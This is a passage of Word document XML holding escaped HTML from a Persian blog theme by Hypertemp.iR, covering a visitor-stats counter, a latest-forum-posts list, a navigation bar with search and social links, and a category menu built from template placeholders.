          <w:rtl/>
        </w:rPr>
        <w:t>بازديد ديروز</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> : &lt;span class="stVal"&gt;[Yesterday]&lt;/span&gt;&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="384EC230" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;div class="item"&gt;&lt;i class="fa fa-signal"&gt;&lt;/i&gt;&lt;b id="rt-tomarrow-amount"&gt;&lt;/b&gt;&lt;span&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial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روز</w:t>
      </w:r>
      <w:r>
        <w:t>&lt;/span&gt;&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="407C7099" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t xml:space="preserve">&lt;div class="item"&gt;&lt;i class="fa fa-inbox"&gt;&lt;/i&gt;&lt;b id="rt-posts-amount"&gt;&lt;/b&gt;&lt;span&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>تعداد مطالب</w:t>
      </w:r>
      <w:r>
        <w:t>&lt;/span&gt;&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F86A2A" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&lt;div class="item"&gt;&lt;i class="fa fa-users"&gt;&lt;/i&gt;&lt;b id="rt-users-amount"&gt;&lt;/b&gt;&lt;span&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>تعداد کاربران</w:t>
      </w:r>
      <w:r>
        <w:t>&lt;/span&gt;&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550D72CC" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;div class="item"&gt;&lt;i class="fa fa-comments-o"&gt;&lt;/i&gt;&lt;b id="rt-comments-amount"&gt;&lt;/b&gt;&lt;span&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>تعداد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دگاه</w:t>
      </w:r>
      <w:r>
        <w:t>&lt;/span&gt;&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF9D605" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3"/>
    <w:p w14:paraId="2E948849" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;script type="text/javascript"&gt;function vmsNumber(e,m){document.getElementById(m).innerHTML=vmsDef++,vmsSetTimeout=setTimeout(function(){vmsNumber(e,m)},1),vmsDef&gt;e&amp;&amp;clearTimeout(vmsSetTimeout)}vmsDef=0;window.onload = vmsNumber([Blog_User],'rt-users-amount');vmsNumber([Blog_Comments],'rt-comments-amount');vmsNumber([Ip_Yesterday]6,'rt-tomarrow-amount');vmsNumber([Ip_Today]4,'rt-today-amount');vmsNumber([Blog_Posts],'rt-posts-amount');&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="133D25C6" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/aside&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BDEDAD2" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/RB:Counter_Block&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7D857B" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;!--Hypertemp.iR Hit Stats End--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D767555" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="348019D1" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;!--Hypertemp.iR Header Side End--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316B3BE5" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3"/>
    <w:p w14:paraId="79E59947" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;!--Hypertemp.iR Forum Start--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="783637DE" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;RB:Forum_Posts_Block&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="530A423F" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;aside class="forum"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9C5BCE" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;div class="title"&gt;&lt;h4&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>اخر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ارسال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انجمن</w:t>
      </w:r>
      <w:r>
        <w:t>&lt;/h4&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487ABD69" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;a title="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>انجمن</w:t>
      </w:r>
      <w:r>
        <w:t>" href="/forum" target="_blank"&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>ورود به انجمن</w:t>
      </w:r>
      <w:r>
        <w:t>&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C13B3D" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0A61B0" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;div id="loading" style="display:none;"&gt;&lt;i class="fa fa-circle-o-notch fa-spin"&gt;&lt;/i&gt;&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18525E34" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;ul class="rightheme-y"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF4AC63" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3"/>
    <w:p w14:paraId="07860DFC" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;RB:Forum_Posts_Loop&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD342FB" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FBD6723" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;div class="avatar" style="background:url('/user/Avatar/hypertemp/[Forum_Post_Last_Author].jpg'),url('/user/Avatar/hypertemp/[Forum_Post_Last_Author].png'),url('/user/Avatar/hypertemp/[Forum_Post_Last_Author].gif'),url('http://up.hypertemp.ir/view/2519939/img.jpg');background-size:cover;"&gt;&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702A55EC" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&lt;div class="entery"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="232F1F05" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;h3&gt;&lt;a target="_blank" href="[Forum_Post_Url]"&gt;[Forum_Post_Title]&lt;/a&gt;&lt;/h3&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C5C606" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;span&gt;&lt;i class="fa fa-eye"&gt;&lt;/i&gt; [Forum_Post_Hit]&lt;/span&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4AD1C2" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;span&gt;&lt;i class="fa fa-comments-o"&gt;&lt;/i&gt; [Forum_Post_Count_Answer]&lt;/span&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="005DE9CE" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;span&gt;&lt;i class="fa fa-user"&gt;&lt;/i&gt; [Forum_Post_Last_Author]&lt;/span&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DDF2DB9" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E9DA4A" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57682711" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/RB:Forum_Posts_Loop&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51AF9D61" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3"/>
    <w:p w14:paraId="593562C9" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3"/>
    <w:p w14:paraId="701B9CF9" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/ul&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E61E222" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;RB:Forum_Posts_Page_Block&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C2D1EEC" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>[Forum_Posts_Code_Ajax]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A082538" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>[Forum_Posts_Page]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="158894E3" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/RB:Forum_Posts_Page_Block&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C47D24" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/aside&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14019C28" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/RB:Forum_Posts_Block&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD06859" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;!--Hypertemp.iR Forum End--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="023FF28E" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3"/>
    <w:p w14:paraId="6A48EB5A" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A79DDA0" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/header&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00380C42" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;!--Hypertemp.iR Header End--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013AFE3F" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3"/>
    <w:p w14:paraId="4F386831" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;!--Hypertemp.iR Main Start--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4201F595" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;section class="hypertemp"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603722C1" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3"/>
    <w:p w14:paraId="3E3D26D9" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;!--Hypertemp.iR Nav Start--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B08196A" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;nav class="nav-top"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C3D565" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3"/>
    <w:p w14:paraId="43DE4E05" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&lt;!--Hypertemp.iR Logo Top Start--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4263F6D9" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;a href="[RB:Blog_Url]" title="[RB:Blog_Title]"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1001C54B" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;img src="https://rozup.ir/view/3688931/win%2010.png" alt="[RB:Blog_Title]" class="logo"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EFA7549" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;div class="logo-title"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59723D59" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;h1&gt;sport-blue2&lt;/h1&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA85248" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t xml:space="preserve">&lt;h2&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>به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طرح آب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خوش آمد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 &lt;/h2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A694A8D" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="645DFE7A" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F886CF" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;!--Hypertemp.iR Logo Top End--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5869AC" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3"/>
    <w:p w14:paraId="53DAC758" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;!--Hypertemp.iR Search Start--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B1E6F56" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;RB:Blog_Search_Block&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A1ED17" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;div class="search"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441163B2" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;input type="text" name="search" placeholder="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>جست و جو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مطلب</w:t>
      </w:r>
      <w:r>
        <w:t>..." value="[Search_Value]"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A2A836C" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;input type="submit" value="</w:t>
      </w:r>
      <w:r>
        <w:t>"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C00A551" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD30186" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/RB:Blog_Search_Block&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CEE3724" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;!--Hypertemp.iR Search End--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C62229" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3"/>
    <w:p w14:paraId="4119870A" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;!--Hypertemp.iR Fix Links Start--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B5E6620" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;div class="link"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8084C9" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;script type="text/javascript" src="https://apis.google.com/js/plusone.js"&gt;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4072DE79" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;div class="fix-google"&gt;&lt;g:plusone href="http://hypertemp.ir"&gt;&lt;/g:plusone&gt;&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11CD9E6D" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;a href="http://telegram.me/telegram" target="_blank" title="</w:t>
      </w:r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تلگرام ادم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 " rel="nofollow"&gt;&lt;i class="fa fa-paper-plane-o"&gt;&lt;/i&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>پشت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در تلگرام</w:t>
      </w:r>
      <w:r>
        <w:t>&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1843869B" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t xml:space="preserve">&lt;button id="btnFullscreen" type="button"&gt;&lt;i class="fa fa-television"&gt;&lt;/i&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>تمام صفحه</w:t>
      </w:r>
      <w:r>
        <w:t>&lt;/button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718F94F7" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C52AB76" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;!--Hypertemp.iR Fix Links End--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A889EB6" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3"/>
    <w:p w14:paraId="663DABF1" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&lt;/nav&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66FA3841" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;!--Hypertemp.iR Nav End--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="284D118C" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3"/>
    <w:p w14:paraId="2FA6EBF8" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;!--Hypertemp.iR Category Start--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B76734" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;!--Hypertemp.iR Category Start--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63FF151F" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;RB:Blog_Category_Block&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BDA414B" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;aside class="category" id="accordion"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F07BDD4" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;ul class="accordion"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="370A30DA" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3"/>
    <w:p w14:paraId="1D00F5F0" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;RB:Blog_Category_Loop&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E7AA64" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A808CA0" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;div class="link"&gt;&lt;i class="fa fa-[Catgory_Img_Url]"&gt;&lt;/i&gt;&lt;span&gt;[Catgory_Title]&lt;/span&gt;&lt;i class="fa fa-chevron-down"&gt;&lt;/i&gt;&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="309FCF36" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;ul class="submenu"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DDD1278" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;RB:Blog_Sub_Category_Loop&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="251A8D37" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t xml:space="preserve">&lt;li&gt;&lt;a href="[Catgory_Sub_Link]" target="_blank" rel="category"&gt;[Catgory_Sub_Title]&lt;/a&gt;&lt;span&gt;[Catgory_Sub_Posts] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>پست</w:t>
      </w:r>
      <w:r>
        <w:t>&lt;/span&gt;&lt;/li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A84822" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/RB:Blog_Sub_Category_Loop&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E3E8F8" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/ul&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="426D1071" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1C882E" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/RB:Blog_Category_Loop&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA13CCD" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3"/>
    <w:p w14:paraId="16A67A7D" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/ul&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB5C430" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/aside&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57341072" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/RB:Blog_Category_Block&gt;</w:t>
      </w:r>
    </w:p>
